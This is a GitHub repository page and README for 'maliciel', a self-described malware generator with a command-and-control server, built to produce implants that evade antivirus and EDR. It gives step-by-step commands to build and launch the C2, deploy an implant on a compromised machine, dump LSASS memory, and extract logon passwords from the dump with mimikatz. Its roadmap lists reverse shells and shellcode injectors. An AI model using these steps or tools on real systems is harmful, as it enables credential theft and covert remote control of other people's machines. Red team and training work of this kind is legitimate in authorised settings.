Skip to content

SeraRepo/maliciel

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
Project
Project
 
 
Resources
Resources
 
 
Scripts
Scripts
 
 
images
images
 
 
.gitignore
.gitignore
 
 
.gitmodules
.gitmodules
 
 
README.md
README.md
 
 

Repository files navigation

Python Docker Docker-compose MinGW-w64


Logo

maliciel

A custom C2 made for red team operation.
Explore the docs »

Report Bug · Request Feature

Table of Contents
  1. About The Project
  2. Getting Started
  3. Usage
  4. Roadmap
  5. Contributing
  6. Acknowledgments

About The Project

Product Name Screen Shot

maliciel is a project about C2 creation and maldev training.

The project is divided into two parts: the first is the creation of a Command Center (C2) to create and control implants, and the second is the creation of a resource base for maldev training.

C2 arose from a need for a customised solution for the Red Team, as existing solutions had limited effectiveness. The idea is to create a tool that can generate implants that are undetectable by AV/EDR solutions, discreet and resilient; and to be able to control these implants.

(back to top)

Repository Organization

The "Project" folder contains the technical solution (maliciel). It is currently composed of three subfolder : the "C2", which is composed of a server and a CLI interface ; the "Implant", which is currently the source code of our implant ; and the "Maliciel", an undetectable shellcode and code injector launcher.

The "Documentation" folder contains all documentation needed to understand and continue the project.

(back to top)

Getting Started

Prerequisites

The following software are mandatory in order for the project to work:

  • Python >= 3.9
  • Docker >= 20.10
  • docker-compose >= 1.29
  • MinGW-w64 >= 10.2

Installation

  1. Clone the repo 
    git clone https://github.com/SeraRepo/maliciel.git
  2. Install the CLI interface
    • Install the python dependencies 
      cd Project/C2/CLI
python3 -m pip install -r requirements.txt
    • Launch the CLI 
      python3 -m maliciel-C2.py
  3. Install the C2 server
    • On the machine or cloud you want the server to be
    • Clone the repo 
      git clone https://github.com/SeraRepo/maliciel.git
    • Launch the server 
      cd Project/C2/
docker-compose up
  4. Install Packages
    • Install VCPKG 
       git clone https://github.com/Microsoft/vcpkg.git
 .\vcpkg\bootstrap-vcpkg.bat
    • Install packages 
       .\vcpkg.exe integrate install
 .\vcpkg.exe install boost-uuid:x64-windows
 .\vcpkg.exe install boost-property-tree:x64-windows
 .\vcpkg.exe install boost-system:x64-windows
 .\vcpkg.exe install cpr:x64-windows
 .\vcpkg.exe install nlohmann-json:x64-windows
  5. Usage Dump Lsass
    • Compile with MinGW [LINUX] 
       cd Project\Implant\maliciel\Dump
 x86_64-w64-mingw32-g++ -O2 dump.cpp -o dump.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -ldbghelp
    • Dump Lsass [WIN] 
       .\dump.exe namedump.dmp
    • Read Dump with Mimikatz [WIN] 
       .\mimikatz.exe
 sekurlsa::minidump c:\pathOfDump\namedump.dmp
 sekurlsa::logonpasswords

(back to top)

Usage

Maliciel

See the README.md on the /maliciel folder.

C2

  1. Launch the C2 server, it can be launched localy or in a cloud server
  cd C2/ 
  sudo docker-compose up

  1. Change the IP adress on the CLI ('C2/CLI/maliciel-C2.py')

  2. Compile the implant via Visual Studio

    Open Implant/maliciel.sln via Visual Studion

    Run the Build command

  3. Launch the executable file on the compromise machine

  4. Send command to the C2 server via the CLI

    • Send commmand

      python maliciel-C2.py add-task --task-type [task_name] --option [option1],[option2]

    • List commands sent

      python maliciel-C2.py list-tasks

    • List results returned

      python maliciel-C2.py list-results

    • List history

      python maliciel-C2.py list-history

(back to top)

Roadmap

  • Create the C2 server
  • Create the CLI interface
  • Create the basic implant
    • Communication with the C2
    • Accept command
    • Spawn Reverse shell
    • Extract LSASS credentials
  • Create shellcode injector generator
  • Add linux compilation for the implant
  • Rework CLI interface
  • Add the generator to the solution
  • Create C++ Shellcode generator
  • Add fileless shellcode to the shellcode injector generator

See the open issues for a full list of proposed features (and known issues).

(back to top)

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

(back to top)

About

Malware generator connected to a C2

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages